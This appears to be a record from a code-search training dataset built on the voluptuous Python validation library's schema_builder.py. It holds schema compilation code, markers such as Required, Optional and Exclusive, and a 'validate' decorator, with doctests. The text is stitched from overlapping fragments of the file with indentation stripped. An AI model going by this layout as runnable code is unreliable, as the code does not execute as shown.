>>> with raises(er.MultipleInvalid, "not a valid value for dictionary value @ data['one']"):
... validate({'one': 'three'})
An invalid key:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['two']"):
... validate({'two': 'three'})
Validation function, in this case the "int" type:
>>> validate = Schema({'one': 'two', 'three': 'four', int: str})
Valid integer input:
>>> validate({10: 'twenty'})
{10: 'twenty'}
By default, a "type" in the schema (in this case "int") will be used
purely to validate that the corresponding value is of that type. It
will not Coerce the value:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['10']"):
... validate({'10': 'twenty'})
Wrap them in the Coerce() function to achieve this:
>>> from voluptuous import Coerce
>>> validate = Schema({'one': 'two', 'three': 'four',
... Coerce(int): str})
>>> validate({'10': 'twenty'})
{10: 'twenty'}
Custom message for required key
>>> validate = Schema({Required('one', 'required'): 'two'})
>>> with raises(er.MultipleInvalid, "required @ data['one']"):
... validate({})
(This is to avoid unexpected surprises.)
Multiple errors for nested field in a dict:
>>> validate = Schema({
... 'adict': {
... 'strfield': str,
... 'intfield': int
... }
... })
>>> try:
... validate({
... 'adict': {
... 'strfield': 123,
... 'intfield': 'one'
... }
... })
... except er.MultipleInvalid as e:
... print(sorted(str(i) for i in e.errors)) # doctest: +NORMALIZE_WHITESPACE
["expected int for dictionary value @ data['adict']['intfield']",
"expected str for dictionary value @ data['adict']['strfield']"]
"""
base_validate = self._compile_mapping(
schema, invalid_msg='dictionary value')
groups_of_exclusion = {}
groups_of_inclusion = {}
for node in schema:
if isinstance(node, Exclusive):
g = groups_of_exclusion.setdefault(node.group_of_exclusion, [])
g.append(node)
elif isinstance(node, Inclusive):
g = groups_of_inclusion.setdefault(node.group_of_inclusion, [])
g.append(node)
def validate_dict(path, data):
if not isinstance(data, dict):
raise er.DictInvalid('expected a dictionary', path)
errors = []
for label, group in groups_of_exclusion.items():
exists = False
for exclusive in group:
if exclusive.schema in data:
if exists:
msg = exclusive.msg if hasattr(exclusive, 'msg') and exclusive.msg else \
"two or more values in the same group of exclusion '%s'" % label
next_path = path + [VirtualPathComponent(label)]
errors.append(er.ExclusiveInvalid(msg, next_path))
break
exists = True
if errors:
raise er.MultipleInvalid(errors)
for label, group in groups_of_inclusion.items():
included = [node.schema in data for node in group]
if any(included) and not all(included):
msg = "some but not all values in the same group of inclusion '%s'" % label
for g in group:
if hasattr(g, 'msg') and g.msg:
msg = g.msg
break
next_path = path + [VirtualPathComponent(label)]
errors.append(er.InclusiveInvalid(msg, next_path))
break
if errors:
raise er.MultipleInvalid(errors)
out = data.__class__()
return base_validate(path, iteritems(data), out)
return validate_dict
def _compile_sequence(self, schema, seq_type):
"""Validate a sequence type.
This is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
_compiled = [self._compile(s) for s in schema]
seq_type_name = seq_type.__name__
def validate_sequence(path, data):
if not isinstance(data, seq_type):
raise er.SequenceTypeInvalid('expected a %s' % seq_type_name, path)
# Empty seq schema, allow any data.
if not schema:
if data:
raise er.MultipleInvalid([
er.ValueInvalid('not a valid value', [value]) for value in data
])
return data
out = []
invalid = None
errors = []
index_path = UNDEFINED
for i, value in enumerate(data):
index_path = path + [i]
invalid = None
for validate in _compiled:
try:
cval = validate(index_path, value)
if cval is not Remove: # do not include Remove values
out.append(cval)
break
except er.Invalid as e:
if len(e.path) > len(index_path):
raise
invalid = e
else:
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
if _isnamedtuple(data):
return type(data)(*out)
else:
return type(data)(out)
return validate_sequence
def _compile_tuple(self, schema):
"""Validate a tuple.
A tuple is a sequence of valid values or validators tried in order.
>>> validator = Schema(('one', 'two', int))
>>> validator(('one',))
('one',)
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator((3.5,))
>>> validator((1,))
(1,)
"""
return self._compile_sequence(schema, tuple)
def _compile_list(self, schema):
"""Validate a list.
A list is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
return self._compile_sequence(schema, list)
def _compile_set(self, schema):
"""Validate a set.
A set is an unordered collection of unique elements.
>>> validator = Schema({int})
>>> validator(set([42])) == set([42])
True
>>> with raises(er.Invalid, 'expected a set'):
... validator(42)
>>> with raises(er.MultipleInvalid, 'invalid value in set'):
... validator(set(['a']))
"""
type_ = type(schema)
type_name = type_.__name__
def validate_set(path, data):
if not isinstance(data, type_):
raise er.Invalid('expected a %s' % type_name, path)
_compiled = [self._compile(s) for s in schema]
errors = []
for value in data:
for validate in _compiled:
try:
validate(path, value)
break
except er.Invalid:
pass
else:
invalid = er.Invalid('invalid value in %s' % type_name, path)
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
return data
return validate_set
def extend(self, schema, required=None, extra=None):
"""Create a new `Schema` by merging this and the provided `schema`.
Neither this `Schema` nor the provided `schema` are modified. The
resulting `Schema` inherits the `required` and `extra` parameters of
this, unless overridden.
Both schemas must be dictionary-based.
:param schema: dictionary to extend this `Schema` with
:param required: if set, overrides `required` of this `Schema`
:param extra: if set, overrides `extra` of this `Schema`
"""
assert type(self.schema) == dict and type(schema) == dict, 'Both schemas must be dictionary-based'
result = self.schema.copy()
# returns the key that may have been passed as arugment to Marker constructor
def key_literal(key):
return (key.schema if isinstance(key, Marker) else key)
# build a map that takes the key literals to the needed objects
# literal -> Required|Optional|literal
result_key_map = dict((key_literal(key), key) for key in result)
# for each item in the extension schema, replace duplicates
# or add new keys
for key, value in iteritems(schema):
# if the key is already in the dictionary, we need to replace it
# transform key to literal before checking presence
if key_literal(key) in result_key_map:
result_key = result_key_map[key_literal(key)]
result_value = result[result_key]
# if both are dictionaries, we need to extend recursively
# create the new extended sub schema, then remove the old key and add the new one
if type(result_value) == dict and type(value) == dict:
new_value = Schema(result_value).extend(value).schema
del result[result_key]
result[key] = new_value
# one or the other or both are not sub-schemas, simple replacement is fine
# remove old key and add new one
else:
del result[result_key]
result[key] = value
# key is new and can simply be added
else:
result[key] = value
# recompile and send old object
result_cls = type(self)
result_required = (required if required is not None else self.required)
result_extra = (extra if extra is not None else self.extra)
return result_cls(result, required=result_required, extra=result_extra)
def _compile_scalar(schema):
"""A scalar value.
The schema can either be a value or a type.
>>> _compile_scalar(int)([], 1)
1
>>> with raises(er.Invalid, 'expected float'):
... _compile_scalar(float)([], '1')
Callables have
>>> _compile_scalar(lambda v: float(v))([], '1')
1.0
As a convenience, ValueError's are trapped:
>>> with raises(er.Invalid, 'not a valid value'):
... _compile_scalar(lambda v: float(v))([], 'a')
"""
if inspect.isclass(schema):
def validate_instance(path, data):
if isinstance(data, schema):
return data
else:
msg = 'expected %s' % schema.__name__
raise er.TypeInvalid(msg, path)
return validate_instance
if callable(schema):
def validate_callable(path, data):
try:
return schema(data)
except ValueError as e:
raise er.ValueInvalid('not a valid value', path)
except er.Invalid as e:
e.prepend(path)
raise
return validate_callable
def validate_value(path, data):
if data != schema:
raise er.ScalarInvalid('not a valid value', path)
return data
return validate_value
def _compile_itemsort():
'''return sort function of mappings'''
def is_extra(key_):
return key_ is Extra
def is_remove(key_):
return isinstance(key_, Remove)
def is_marker(key_):
return isinstance(key_, Marker)
def is_type(key_):
return inspect.isclass(key_)
def is_callable(key_):
return callable(key_)
# priority list for map sorting (in order of checking)
# We want Extra to match last, because it's a catch-all. On the other hand,
# Remove markers should match first (since invalid values will not
# raise an Error, instead the validator will check if other schemas match
# the same value).
priority = [(1, is_remove), # Remove highest priority after values
(2, is_marker), # then other Markers
(4, is_type), # types/classes lowest before Extra
(3, is_callable), # callables after markers
(5, is_extra)] # Extra lowest priority
def item_priority(item_):
key_ = item_[0]
for i, check_ in priority:
if check_(key_):
return i
# values have hightest priorities
return 0
return item_priority
_sort_item = _compile_itemsort()
def _iterate_mapping_candidates(schema):
"""Iterate over schema in a meaningful order."""
# Without this, Extra might appear first in the iterator, and fail to
# validate a key even though it's a Required that has its own validation,
# generating a false positive.
return sorted(iteritems(schema), key=_sort_item)
def _iterate_object(obj):
"""Return iterator over object attributes. Respect objects with
defined __slots__.
"""
d = {}
try:
d = vars(obj)
except TypeError:
# maybe we have named tuple here?
if hasattr(obj, '_asdict'):
d = obj._asdict()
for item in iteritems(d):
yield item
try:
slots = obj.__slots__
except AttributeError:
pass
else:
for key in slots:
if key != '__dict__':
yield (key, getattr(obj, key))
class Msg(object):
"""Report a user-friendly message if a schema fails to validate.
>>> validate = Schema(
... Msg(['one', 'two', int],
... 'should be one of "one", "two" or an integer'))
>>> with raises(er.MultipleInvalid, 'should be one of "one", "two" or an integer'):
... validate(['three'])
Messages are only applied to invalid direct descendants of the schema:
>>> validate = Schema(Msg([['one', 'two', int]], 'not okay!'))
>>> with raises(er.MultipleInvalid, 'expected int @ data[0][0]'):
... validate([['three']])
The type which is thrown can be overridden but needs to be a subclass of Invalid
>>> with raises(er.SchemaError, 'Msg can only use subclases of Invalid as custom class'):
... validate = Schema(Msg([int], 'should be int', cls=KeyError))
If you do use a subclass of Invalid, that error will be thrown (wrapped in a MultipleInvalid)
>>> validate = Schema(Msg([['one', 'two', int]], 'not okay!', cls=er.RangeInvalid))
>>> try:
... validate(['three'])
... except er.MultipleInvalid as e:
... assert isinstance(e.errors[0], er.RangeInvalid)
"""
def __init__(self, schema, msg, cls=None):
if cls and not issubclass(cls, er.Invalid):
raise er.SchemaError("Msg can only use subclases of"
" Invalid as custom class")
self._schema = schema
self.schema = Schema(schema)
self.msg = msg
self.cls = cls
def __call__(self, v):
try:
return self.schema(v)
except er.Invalid as e:
if len(e.path) > 1:
raise e
else:
raise (self.cls or er.Invalid)(self.msg)
def __repr__(self):
return 'Msg(%s, %s, cls=%s)' % (self._schema, self.msg, self.cls)
class Object(dict):
"""Indicate that we should work with attributes, not keys."""
def __init__(self, schema, cls=UNDEFINED):
self.cls = cls
super(Object, self).__init__(schema)
class VirtualPathComponent(str):
def __str__(self):
return '<' + self + '>'
def __repr__(self):
return self.__str__()
# Markers.py
class Marker(object):
"""Mark nodes for special treatment."""
def __init__(self, schema_, msg=None, description=None):
self.schema = schema_
self._schema = Schema(schema_)
self.msg = msg
self.description = description
def __call__(self, v):
try:
return self._schema(v)
except er.Invalid as e:
if not self.msg or len(e.path) > 1:
raise
raise er.Invalid(self.msg)
def __str__(self):
return str(self.schema)
def __repr__(self):
return repr(self.schema)
def __lt__(self, other):
if isinstance(other, Marker):
return self.schema < other.schema
return self.schema < other
def __hash__(self):
return hash(self.schema)
def __eq__(self, other):
return self.schema == other
def __ne__(self, other):
return not(self.schema == other)
class Optional(Marker):
"""Mark a node in the schema as optional, and optionally provide a default
>>> schema = Schema({Optional('key'): str})
>>> schema({})
{}
>>> schema = Schema({Optional('key', default='value'): str})
>>> schema({})
{'key': 'value'}
>>> schema = Schema({Optional('key', default=list): list})
>>> schema({})
{'key': []}
If 'required' flag is set for an entire schema, optional keys aren't required
>>> schema = Schema({
... Optional('key'): str,
... 'key2': str
... }, required=True)
>>> schema({'key2':'value'})
{'key2': 'value'}
"""
def __init__(self, schema, msg=None, default=UNDEFINED, description=None):
super(Optional, self).__init__(schema, msg=msg,
description=description)
self.default = default_factory(default)
class Exclusive(Optional):
"""Mark a node in the schema as exclusive.
Exclusive keys inherited from Optional:
>>> schema = Schema({Exclusive('alpha', 'angles'): int, Exclusive('beta', 'angles'): int})
>>> schema({'alpha': 30})
{'alpha': 30}
Keys inside a same group of exclusion cannot be together, it only makes sense for dictionaries:
>>> with raises(er.MultipleInvalid, "two or more values in the same group of exclusion 'angles' @ data[<angles>]"):
... schema({'alpha': 30, 'beta': 45})
For example, API can provides multiple types of authentication, but only one works in the same time:
>>> msg = 'Please, use only one type of authentication at the same time.'
>>> schema = Schema({
... Exclusive('classic', 'auth', msg=msg):{
... Required('email'): basestring,
... Required('password'): basestring
... },
... Exclusive('internal', 'auth', msg=msg):{
... Required('secret_key'): basestring
... },
... Exclusive('social', 'auth', msg=msg):{
... Required('social_network'): basestring,
... Required('token'): basestring
... }
... })
>>> with raises(er.MultipleInvalid, "Please, use only one type of authentication at the same time. @ data[<auth>]"):
... schema({'classic': {'email': 'foo@example.com', 'password': 'bar'},
... 'social': {'social_network': 'barfoo', 'token': 'tEMp'}})
"""
def __init__(self, schema, group_of_exclusion, msg=None, description=None):
super(Exclusive, self).__init__(schema, msg=msg,
description=description)
self.group_of_exclusion = group_of_exclusion
class Inclusive(Optional):
""" Mark a node in the schema as inclusive.
Inclusive keys inherited from Optional:
>>> schema = Schema({
... Inclusive('filename', 'file'): str,
... Inclusive('mimetype', 'file'): str
... })
>>> data = {'filename': 'dog.jpg', 'mimetype': 'image/jpeg'}
>>> data == schema(data)
True
Keys inside a same group of inclusive must exist together, it only makes sense for dictionaries:
>>> with raises(er.MultipleInvalid, "some but not all values in the same group of inclusion 'file' @ data[<file>]"):
... schema({'filename': 'dog.jpg'})
If none of the keys in the group are present, it is accepted:
>>> schema({})
{}
For example, API can return 'height' and 'width' together, but not separately.
>>> msg = "Height and width must exist together"
>>> schema = Schema({
... Inclusive('height', 'size', msg=msg): int,
... Inclusive('width', 'size', msg=msg): int
... })
>>> with raises(er.MultipleInvalid, msg + " @ data[<size>]"):
... schema({'height': 100})
>>> with raises(er.MultipleInvalid, msg + " @ data[<size>]"):
... schema({'width': 100})
>>> data = {'height': 100, 'width': 100}
>>> data == schema(data)
True
"""
def __init__(self, schema, group_of_inclusion,
msg=None, description=None, default=UNDEFINED):
super(Inclusive, self).__init__(schema, msg=msg,
default=default,
description=description)
self.group_of_inclusion = group_of_inclusion
class Required(Marker):
"""Mark a node in the schema as being required, and optionally provide a default value.
>>> schema = Schema({Required('key'): str})
>>> with raises(er.MultipleInvalid, "required key not provided @ data['key']"):
... schema({})
>>> schema = Schema({Required('key', default='value'): str})
>>> schema({})
{'key': 'value'}
>>> schema = Schema({Required('key', default=list): list})
>>> schema({})
{'key': []}
"""
def __init__(self, schema, msg=None, default=UNDEFINED, description=None):
super(Required, self).__init__(schema, msg=msg,
description=description)
self.default = default_factory(default)
class Remove(Marker):
"""Mark a node in the schema to be removed and excluded from the validated
output. Keys that fail validation will not raise ``Invalid``. Instead, these
keys will be treated as extras.
>>> schema = Schema({str: int, Remove(int): str})
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data[1]"):
... schema({'keep': 1, 1: 1.0})
>>> schema({1: 'red', 'red': 1, 2: 'green'})
{'red': 1}
>>> schema = Schema([int, Remove(float), Extra])
>>> schema([1, 2, 3, 4.0, 5, 6.0, '7'])
[1, 2, 3, 5, '7']
"""
def __call__(self, v):
super(Remove, self).__call__(v)
return self.__class__
def __repr__(self):
return "Remove(%r)" % (self.schema,)
def __hash__(self):
return object.__hash__(self)
def message(default=None, cls=None):
"""Convenience decorator to allow functions to provide a message.
Set a default message:
>>> @message('not an integer')
... def isint(v):
... return int(v)
>>> validate = Schema(isint())
>>> with raises(er.MultipleInvalid, 'not an integer'):
... validate('a')
The message can be overridden on a per validator basis:
>>> validate = Schema(isint('bad'))
>>> with raises(er.MultipleInvalid, 'bad'):
... validate('a')
The class thrown too:
>>> class IntegerInvalid(er.Invalid): pass
>>> validate = Schema(isint('bad', clsoverride=IntegerInvalid))
>>> try:
... validate('a')
... except er.MultipleInvalid as e:
... assert isinstance(e.errors[0], IntegerInvalid)
"""
if cls and not issubclass(cls, er.Invalid):
raise er.SchemaError("message can only use subclases of Invalid as custom class")
def decorator(f):
@wraps(f)
def check(msg=None, clsoverride=None):
@wraps(f)
def wrapper(*args, **kwargs):
try:
return f(*args, **kwargs)
except ValueError:
raise (clsoverride or cls or er.ValueInvalid)(msg or default or 'invalid value')
return wrapper
return check
return decorator
def _args_to_dict(func, args):
"""Returns argument names as values as key-value pairs."""
if sys.version_info >= (3, 0):
arg_count = func.__code__.co_argcount
arg_names = func.__code__.co_varnames[:arg_count]
else:
arg_count = func.func_code.co_argcount
arg_names = func.func_code.co_varnames[:arg_count]
arg_value_list = list(args)
arguments = dict((arg_name, arg_value_list[i])
for i, arg_name in enumerate(arg_names)
if i < len(arg_value_list))
return arguments
def validate(*a, **kw):
"""Decorator for validating arguments of a function against a given schema.
Set restrictions for arguments:
>>> @validate(arg1=int, arg2=int)
... def foo(arg1, arg2):
... return arg1 * arg2
Set restriction for returned value:
>>> @validate(arg=int, __return__=int)
... def bar(arg1):
... return arg1 * 2
"""
RETURNS_KEY = '__return__'
def validate_schema_decorator(func):
returns_defined = False
returns = None
schema_args_dict = _args_to_dict(func, a)
schema_arguments = _merge_args_with_kwargs(schema_args_dict, kw)
if RETURNS_KEY in schema_arguments:
returns_defined = True
returns = schema_arguments[RETURNS_KEY]
del schema_arguments[RETURNS_KEY]
input_schema = (Schema(schema_arguments, extra=ALLOW_EXTRA)
if len(schema_arguments) != 0 else lambda x: x)
output_schema = Schema(returns) if returns_defined else lambda x: x
@wraps(func)
def func_wrapper(*args, **kwargs):
args_dict = _args_to_dict(func, args)
arguments = _merge_args_with_kwargs(args_dict, kwargs)
validated_arguments = input_schema(arguments)
output = func(**validated_arguments)
return output_schema(output)
return func_wrapper
return validate_schema_decorator
|
alecthomas/voluptuous | voluptuous/schema_builder.py | validate | python | def validate(*a, **kw):
RETURNS_KEY = '__return__'
def validate_schema_decorator(func):
returns_defined = False
returns = None
schema_args_dict = _args_to_dict(func, a)
schema_arguments = _merge_args_with_kwargs(schema_args_dict, kw)
if RETURNS_KEY in schema_arguments:
returns_defined = True
returns = schema_arguments[RETURNS_KEY]
del schema_arguments[RETURNS_KEY]
input_schema = (Schema(schema_arguments, extra=ALLOW_EXTRA)
if len(schema_arguments) != 0 else lambda x: x)
output_schema = Schema(returns) if returns_defined else lambda x: x
@wraps(func)
def func_wrapper(*args, **kwargs):
args_dict = _args_to_dict(func, args)
arguments = _merge_args_with_kwargs(args_dict, kwargs)
validated_arguments = input_schema(arguments)
output = func(**validated_arguments)
return output_schema(output)
return func_wrapper
return validate_schema_decorator | Decorator for validating arguments of a function against a given schema.
Set restrictions for arguments:
>>> @validate(arg1=int, arg2=int)
... def foo(arg1, arg2):
... return arg1 * arg2
Set restriction for returned value:
>>> @validate(arg=int, __return__=int)
... def bar(arg1):
... return arg1 * 2 | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/schema_builder.py#L1256-L1301 | null | import collections
import inspect
import re
from functools import wraps
import sys
from contextlib import contextmanager
import itertools
from voluptuous import error as er
if sys.version_info >= (3,):
long = int
unicode = str
basestring = str
ifilter = filter
def iteritems(d):
return d.items()
else:
from itertools import ifilter
def iteritems(d):
return d.iteritems()
if sys.version_info >= (3, 3):
_Mapping = collections.abc.Mapping
else:
_Mapping = collections.Mapping
"""Schema validation for Python data structures.
Given eg. a nested data structure like this:
{
'exclude': ['Users', 'Uptime'],
'include': [],
'set': {
'snmp_community': 'public',
'snmp_timeout': 15,
'snmp_version': '2c',
},
'targets': {
'localhost': {
'exclude': ['Uptime'],
'features': {
'Uptime': {
'retries': 3,
},
'Users': {
'snmp_community': 'monkey',
'snmp_port': 15,
},
},
'include': ['Users'],
'set': {
'snmp_community': 'monkeys',
},
},
},
}
A schema like this:
>>> settings = {
... 'snmp_community': str,
... 'retries': int,
... 'snmp_version': All(Coerce(str), Any('3', '2c', '1')),
... }
>>> features = ['Ping', 'Uptime', 'Http']
>>> schema = Schema({
... 'exclude': features,
... 'include': features,
... 'set': settings,
... 'targets': {
... 'exclude': features,
... 'include': features,
... 'features': {
... str: settings,
... },
... },
... })
Validate like so:
>>> schema({
... 'set': {
... 'snmp_community': 'public',
... 'snmp_version': '2c',
... },
... 'targets': {
... 'exclude': ['Ping'],
... 'features': {
... 'Uptime': {'retries': 3},
... 'Users': {'snmp_community': 'monkey'},
... },
... },
... }) == {
... 'set': {'snmp_version': '2c', 'snmp_community': 'public'},
... 'targets': {
... 'exclude': ['Ping'],
... 'features': {'Uptime': {'retries': 3},
... 'Users': {'snmp_community': 'monkey'}}}}
True
"""
# options for extra keys
PREVENT_EXTRA = 0 # any extra key not in schema will raise an error
ALLOW_EXTRA = 1 # extra keys not in schema will be included in output
REMOVE_EXTRA = 2 # extra keys not in schema will be excluded from output
def _isnamedtuple(obj):
return isinstance(obj, tuple) and hasattr(obj, '_fields')
primitive_types = (str, unicode, bool, int, float)
class Undefined(object):
def __nonzero__(self):
return False
def __repr__(self):
return '...'
UNDEFINED = Undefined()
def Self():
raise er.SchemaError('"Self" should never be called')
def default_factory(value):
if value is UNDEFINED or callable(value):
return value
return lambda: value
@contextmanager
def raises(exc, msg=None, regex=None):
try:
yield
except exc as e:
if msg is not None:
assert str(e) == msg, '%r != %r' % (str(e), msg)
if regex is not None:
assert re.search(regex, str(e)), '%r does not match %r' % (str(e), regex)
def Extra(_):
"""Allow keys in the data that are not present in the schema."""
raise er.SchemaError('"Extra" should never be called')
# As extra() is never called there's no way to catch references to the
# deprecated object, so we just leave an alias here instead.
extra = Extra
class Schema(object):
"""A validation schema.
The schema is a Python tree-like structure where nodes are pattern
matched against corresponding trees of values.
Nodes can be values, in which case a direct comparison is used, types,
in which case an isinstance() check is performed, or callables, which will
validate and optionally convert the value.
We can equate schemas also.
For Example:
>>> v = Schema({Required('a'): unicode})
>>> v1 = Schema({Required('a'): unicode})
>>> v2 = Schema({Required('b'): unicode})
>>> assert v == v1
>>> assert v != v2
"""
_extra_to_name = {
REMOVE_EXTRA: 'REMOVE_EXTRA',
ALLOW_EXTRA: 'ALLOW_EXTRA',
PREVENT_EXTRA: 'PREVENT_EXTRA',
}
def __init__(self, schema, required=False, extra=PREVENT_EXTRA):
"""Create a new Schema.
:param schema: Validation schema. See :module:`voluptuous` for details.
:param required: Keys defined in the schema must be in the data.
:param extra: Specify how extra keys in the data are treated:
- :const:`~voluptuous.PREVENT_EXTRA`: to disallow any undefined
extra keys (raise ``Invalid``).
- :const:`~voluptuous.ALLOW_EXTRA`: to include undefined extra
keys in the output.
- :const:`~voluptuous.REMOVE_EXTRA`: to exclude undefined extra keys
from the output.
- Any value other than the above defaults to
:const:`~voluptuous.PREVENT_EXTRA`
"""
self.schema = schema
self.required = required
self.extra = int(extra) # ensure the value is an integer
self._compiled = self._compile(schema)
@classmethod
def infer(cls, data, **kwargs):
"""Create a Schema from concrete data (e.g. an API response).
For example, this will take a dict like:
{
'foo': 1,
'bar': {
'a': True,
'b': False
},
'baz': ['purple', 'monkey', 'dishwasher']
}
And return a Schema:
{
'foo': int,
'bar': {
'a': bool,
'b': bool
},
'baz': [str]
}
Note: only very basic inference is supported.
"""
def value_to_schema_type(value):
if isinstance(value, dict):
if len(value) == 0:
return dict
return {k: value_to_schema_type(v)
for k, v in iteritems(value)}
if isinstance(value, list):
if len(value) == 0:
return list
else:
return [value_to_schema_type(v)
for v in value]
return type(value)
return cls(value_to_schema_type(data), **kwargs)
def __eq__(self, other):
if not isinstance(other, Schema):
return False
return other.schema == self.schema
def __ne__(self, other):
return not (self == other)
def __str__(self):
return str(self.schema)
def __repr__(self):
return "<Schema(%s, extra=%s, required=%s) object at 0x%x>" % (
self.schema, self._extra_to_name.get(self.extra, '??'),
self.required, id(self))
def __call__(self, data):
"""Validate data against this schema."""
try:
return self._compiled([], data)
except er.MultipleInvalid:
raise
except er.Invalid as e:
raise er.MultipleInvalid([e])
# return self.validate([], self.schema, data)
def _compile(self, schema):
if schema is Extra:
return lambda _, v: v
if schema is Self:
return lambda p, v: self._compiled(p, v)
elif hasattr(schema, "__voluptuous_compile__"):
return schema.__voluptuous_compile__(self)
if isinstance(schema, Object):
return self._compile_object(schema)
if isinstance(schema, _Mapping):
return self._compile_dict(schema)
elif isinstance(schema, list):
return self._compile_list(schema)
elif isinstance(schema, tuple):
return self._compile_tuple(schema)
elif isinstance(schema, (frozenset, set)):
return self._compile_set(schema)
type_ = type(schema)
if inspect.isclass(schema):
type_ = schema
if type_ in (bool, bytes, int, long, str, unicode, float, complex, object,
list, dict, type(None)) or callable(schema):
return _compile_scalar(schema)
raise er.SchemaError('unsupported schema data type %r' %
type(schema).__name__)
def _compile_mapping(self, schema, invalid_msg=None):
"""Create validator for given mapping."""
invalid_msg = invalid_msg or 'mapping value'
# Keys that may be required
all_required_keys = set(key for key in schema
if key is not Extra and
((self.required and not isinstance(key, (Optional, Remove))) or
isinstance(key, Required)))
# Keys that may have defaults
all_default_keys = set(key for key in schema
if isinstance(key, Required) or
isinstance(key, Optional))
_compiled_schema = {}
for skey, svalue in iteritems(schema):
new_key = self._compile(skey)
new_value = self._compile(svalue)
_compiled_schema[skey] = (new_key, new_value)
candidates = list(_iterate_mapping_candidates(_compiled_schema))
# After we have the list of candidates in the correct order, we want to apply some optimization so that each
# key in the data being validated will be matched against the relevant schema keys only.
# No point in matching against different keys
additional_candidates = []
candidates_by_key = {}
for skey, (ckey, cvalue) in candidates:
if type(skey) in primitive_types:
candidates_by_key.setdefault(skey, []).append((skey, (ckey, cvalue)))
elif isinstance(skey, Marker) and type(skey.schema) in primitive_types:
candidates_by_key.setdefault(skey.schema, []).append((skey, (ckey, cvalue)))
else:
# These are wildcards such as 'int', 'str', 'Remove' and others which should be applied to all keys
additional_candidates.append((skey, (ckey, cvalue)))
def validate_mapping(path, iterable, out):
required_keys = all_required_keys.copy()
# Build a map of all provided key-value pairs.
# The type(out) is used to retain ordering in case a ordered
# map type is provided as input.
key_value_map = type(out)()
for key, value in iterable:
key_value_map[key] = value
# Insert default values for non-existing keys.
for key in all_default_keys:
if not isinstance(key.default, Undefined) and \
key.schema not in key_value_map:
# A default value has been specified for this missing
# key, insert it.
key_value_map[key.schema] = key.default()
error = None
errors = []
for key, value in key_value_map.items():
key_path = path + [key]
remove_key = False
# Optimization. Validate against the matching key first, then fallback to the rest
relevant_candidates = itertools.chain(candidates_by_key.get(key, []), additional_candidates)
# compare each given key/value against all compiled key/values
# schema key, (compiled key, compiled value)
for skey, (ckey, cvalue) in relevant_candidates:
try:
new_key = ckey(key_path, key)
except er.Invalid as e:
if len(e.path) > len(key_path):
raise
if not error or len(e.path) > len(error.path):
error = e
continue
# Backtracking is not performed once a key is selected, so if
# the value is invalid we immediately throw an exception.
exception_errors = []
# check if the key is marked for removal
is_remove = new_key is Remove
try:
cval = cvalue(key_path, value)
# include if it's not marked for removal
if not is_remove:
out[new_key] = cval
else:
remove_key = True
continue
except er.MultipleInvalid as e:
exception_errors.extend(e.errors)
except er.Invalid as e:
exception_errors.append(e)
if exception_errors:
if is_remove or remove_key:
continue
for err in exception_errors:
if len(err.path) <= len(key_path):
err.error_type = invalid_msg
errors.append(err)
# If there is a validation error for a required
# key, this means that the key was provided.
# Discard the required key so it does not
# create an additional, noisy exception.
required_keys.discard(skey)
break
# Key and value okay, mark as found in case it was
# a Required() field.
required_keys.discard(skey)
break
else:
if remove_key:
# remove key
continue
elif self.extra == ALLOW_EXTRA:
out[key] = value
elif self.extra != REMOVE_EXTRA:
errors.append(er.Invalid('extra keys not allowed', key_path))
# else REMOVE_EXTRA: ignore the key so it's removed from output
# for any required keys left that weren't found and don't have defaults:
for key in required_keys:
msg = key.msg if hasattr(key, 'msg') and key.msg else 'required key not provided'
errors.append(er.RequiredFieldInvalid(msg, path + [key]))
if errors:
raise er.MultipleInvalid(errors)
return out
return validate_mapping
def _compile_object(self, schema):
"""Validate an object.
Has the same behavior as dictionary validator but work with object
attributes.
For example:
>>> class Structure(object):
... def __init__(self, one=None, three=None):
... self.one = one
... self.three = three
...
>>> validate = Schema(Object({'one': 'two', 'three': 'four'}, cls=Structure))
>>> with raises(er.MultipleInvalid, "not a valid value for object value @ data['one']"):
... validate(Structure(one='three'))
"""
base_validate = self._compile_mapping(
schema, invalid_msg='object value')
def validate_object(path, data):
if schema.cls is not UNDEFINED and not isinstance(data, schema.cls):
raise er.ObjectInvalid('expected a {0!r}'.format(schema.cls), path)
iterable = _iterate_object(data)
iterable = ifilter(lambda item: item[1] is not None, iterable)
out = base_validate(path, iterable, {})
return type(data)(**out)
return validate_object
def _compile_dict(self, schema):
"""Validate a dictionary.
A dictionary schema can contain a set of values, or at most one
validator function/type.
A dictionary schema will only validate a dictionary:
>>> validate = Schema({})
>>> with raises(er.MultipleInvalid, 'expected a dictionary'):
... validate([])
An invalid dictionary value:
>>> validate = Schema({'one': 'two', 'three': 'four'})
>>> with raises(er.MultipleInvalid, "not a valid value for dictionary value @ data['one']"):
... validate({'one': 'three'})
An invalid key:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['two']"):
... validate({'two': 'three'})
Validation function, in this case the "int" type:
>>> validate = Schema({'one': 'two', 'three': 'four', int: str})
Valid integer input:
>>> validate({10: 'twenty'})
{10: 'twenty'}
By default, a "type" in the schema (in this case "int") will be used
purely to validate that the corresponding value is of that type. It
will not Coerce the value:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['10']"):
... validate({'10': 'twenty'})
Wrap them in the Coerce() function to achieve this:
>>> from voluptuous import Coerce
>>> validate = Schema({'one': 'two', 'three': 'four',
... Coerce(int): str})
>>> validate({'10': 'twenty'})
{10: 'twenty'}
Custom message for required key
>>> validate = Schema({Required('one', 'required'): 'two'})
>>> with raises(er.MultipleInvalid, "required @ data['one']"):
... validate({})
(This is to avoid unexpected surprises.)
Multiple errors for nested field in a dict:
>>> validate = Schema({
... 'adict': {
... 'strfield': str,
... 'intfield': int
... }
... })
>>> try:
... validate({
... 'adict': {
... 'strfield': 123,
... 'intfield': 'one'
... }
... })
... except er.MultipleInvalid as e:
